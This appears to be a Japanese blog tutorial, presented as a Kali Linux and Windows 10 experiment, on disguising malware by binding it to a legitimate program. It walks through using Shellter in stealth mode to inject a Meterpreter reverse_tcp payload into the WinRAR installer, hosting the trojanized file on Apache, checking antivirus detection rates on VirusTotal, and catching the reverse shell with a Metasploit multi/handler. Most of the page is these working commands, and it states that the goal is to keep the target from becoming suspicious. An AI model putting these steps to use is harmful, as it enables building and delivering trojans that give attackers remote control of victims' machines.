ペイロードに別ファイルの結合

ペイロードに別ファイルの結合

ターゲットにペイロードを実行させても
別の画面がでてきたり
何も実行されないと不審に思われるので
ペイロードに別ファイルを結合し2つのプログラムを実行させることで
偽装させるという手法がある

これが bind
使われる手法としては
画像ファイルにペイロードが結合されていたて
画像を表示したらペイロードが実行されるというもの

あとは
トロイの木馬にゲームと結合させてゲームが起動してプレイできるが
裏ではトロイの木馬の感染処理が進むというもの

今回は KaliLinux と WIndows10 で実験

まず
WinRaR のインストーラーを取得

https://www.win-rar.com/download.html?&L=0
から32bit のものをダウンロード

1
cp Downloads/wrar580.exe /root/Desktop/

でファイルをデスクトップへコピーしておく

次に
Shellter のインストール

1
apt install shellter

次に shellter の初期設定

1
shellter

で起動

ここからは対話形式で設定

1
Choose Operation Mode - Auto/Manual (A/M/H):

となるので自動にしたいので
A

1
PE Target:

で対象ファイルを選ぶので

/root/Desktop/wrar580.exe
を指定

1
Enable Stealth Mode? (Y/N/H):

でステルスを有効化するので Y

1
Use a listed payload or custom? (L/C/H):

となるので
リストから選ぶので L を選択

これでリストがでてくる
今回使うのは revrse_tpc なので

1
Select payload by index:

では1を入力

次に

1
SET LHOST:

となるので KaliLinux のIPを入力

次に使うポートの指定

1
SET LPORT:

となるので4444を入力

最後に

1
Press [Enter] to continue...

となったら Enter

これで作成できたので

1
2
cp Desktop/wrar580.exe /var/www/html/share/
service apache2 restart

でペイロードがダウンロードできるようにしておく

次にウイルス検知にどれくらい引っかかるかチェック

https://www.virustotal.com/ja/
へアクセスし
Choose file をクリック

wrrar580.exeを選び調査
これで70の検知システムのうち27引っかかっているということがわかる

これでファイルは作成できたので
KaliLinux でリバースシェルの待受

1
msfconsole

でMetasploit を起動

1
2
3
4
5
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.134
set lport 4444
exploit

で待受開始

あとは windows10 でリアルタイム保護を無効化した状態で
ブラウザで
wrrar580.exe をダウンロードし実行

これでMeterpreter セッションが確立される

コメントを残す

メールアドレスが公開されることはありません。 * が付いている欄は必須項目です